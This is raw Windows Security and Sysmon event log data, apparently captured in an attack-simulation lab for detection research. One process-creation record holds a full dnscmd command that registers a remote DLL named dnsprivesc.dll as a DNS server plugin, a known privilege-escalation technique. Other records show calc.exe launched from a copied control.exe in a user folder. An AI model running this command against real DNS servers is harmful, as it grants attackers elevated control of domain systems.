4688 2 0 13312 0 0x8020000000000000 1421763 Security quadra.snapattack.labs S-1-5-21-421648065-3458498710-3574272164-2101 dadam SNAPATTACK 0x1b7190d 0x734 C:\Windows\System32\dnscmd.exe %%1936 0x1050 dnscmd 192.168.86.45 /config /serverlevelplugindll \\192.168.86.5\files\dnsprivesc.dll S-1-0-0 - - 0x0 C:\Windows\System32\cmd.exe S-1-16-8192 1 5 4 1 0 0x8000000000000000 17186 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-10-24 18:41:14.574 BD1BA16A-0FCA-6538-C214-000000000F00 2624 C:\Windows\SysWOW64\calc.exe 10.0.19041.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation CALC.EXE calc.exe C:\Users\dadam\ SNAPATTACK\dadam BD1BA16A-291D-62F5-0259-140000000000 0x145902 2 Medium MD5=961E093BE1F666FD38602AD90A5F480F,SHA256=B183BD6414C5123465075D76D2413C999D569492FB543ACBC29690B4B745BDF2,IMPHASH=BA072A972FE6C47C8CF7A0347BB0AF7A BD1BA16A-0FCA-6538-C114-000000000F00 8496 C:\Users\dadam\control.exe "C:\Users\dadam\control.exe" /name Microsoft.Workfolders SNAPATTACK\dadam 1 5 4 1 0 0x8000000000000000 17186 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-10-24 18:41:14.574 BD1BA16A-0FCA-6538-C214-000000000F00 2624 C:\Windows\SysWOW64\calc.exe 10.0.19041.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation CALC.EXE calc.exe C:\Users\dadam\ SNAPATTACK\dadam BD1BA16A-291D-62F5-0259-140000000000 0x145902 2 Medium MD5=961E093BE1F666FD38602AD90A5F480F,SHA256=B183BD6414C5123465075D76D2413C999D569492FB543ACBC29690B4B745BDF2,IMPHASH=BA072A972FE6C47C8CF7A0347BB0AF7A BD1BA16A-0FCA-6538-C114-000000000F00 8496 C:\Users\dadam\control.exe "C:\Users\dadam\control.exe" /name Microsoft.Workfolders SNAPATTACK\dadam